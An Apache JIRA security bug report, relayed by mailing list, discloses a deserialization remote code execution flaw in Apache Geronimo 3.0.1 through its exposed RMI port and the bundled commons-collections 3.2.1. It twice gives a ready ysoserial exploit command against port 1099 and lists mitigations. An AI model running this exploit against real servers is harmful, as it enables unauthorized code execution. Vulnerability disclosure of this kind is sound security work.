[jira] [Created] (GERONIMO-6596) Apache Geronimo Remote Code Execute Vulnerability

Tue, 28 Nov 2017 18:29:10 -0800 

sevck created GERONIMO-6596:
-------------------------------

             Summary: Apache Geronimo Remote Code Execute Vulnerability
                 Key: GERONIMO-6596
                 URL: https://issues.apache.org/jira/browse/GERONIMO-6596
             Project: Geronimo
          Issue Type: Bug
      Security Level: public (Regular issues)
          Components: dependencies, security
    Affects Versions: 3.0.1
         Environment: linux,windows
            Reporter: sevck
            Priority: Critical


The unsupported Geronimo old versions may be also affected

Description:
The Apache Geronimo default enabled JAVA RMI 1099 port and default bind ip 
0.0.0.0, in bash, I use "grep -R InvokerTransformer" command, find defalut use 
commons-collections-3.2.1.jar.

[root@localhost geronimo-tomcat7-javaee6-3.0.1]# grep -R InvokerTransformer .
Binary file 
./repository/commons-collections/commons-collections/3.2.1/commons-collections-3.2.1.jar
 matches

This looks like JAVA deserialization is taken for granted. But,I use ysoserial 
tools. CommonsCollections1 in response
java.lang.ClassNotFoundException: 
org.apache.commons.collections.map.TransformedMap (no security manager: RMI 
class loader disabled),
Seems to be classpath error, In java version 7u21 chanlog:
-------------------------------------
Changes to RMI
>From this release, the RMI property java.rmi.server.useCodebaseOnly is set to 
>true by default. In previous releases the default value was false.

This change of default value may cause RMI-based applications to break 
unexpectedly. The typical symptom is a stack trace that contains a 
java.rmi.UnmarshalException containing a nested 
java.lang.ClassNotFoundException.

For more information, see RMI Enhancements.
---------------------------------------
so,use 7u21 run application.
attack server: 
java -cp ysoserial-master-v0.0.5-gb617b7b-16.jar 
ysoserial.exploit.RMIRegistryExploit 192.168.197.25 1099  Jdk7u21 "touch 
/tmp/apache_geronimo"


Mitigation:
Commons-collections-3.2.1 users should upgrade to 3.2.2
Ports are not allowed for public access
Exploit:
(precondition: server run jre version is 7u21)
java -cp ysoserial-master-v0.0.5-gb617b7b-16.jar 
ysoserial.exploit.RMIRegistryExploit 192.168.197.25 1099  Jdk7u21 "touch 
/tmp/apache_geronimo"
Credit:
This issue was discovered by QingTeng cloud Security of Minded Security 
Researcher jianan.huang



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)

Reply via email to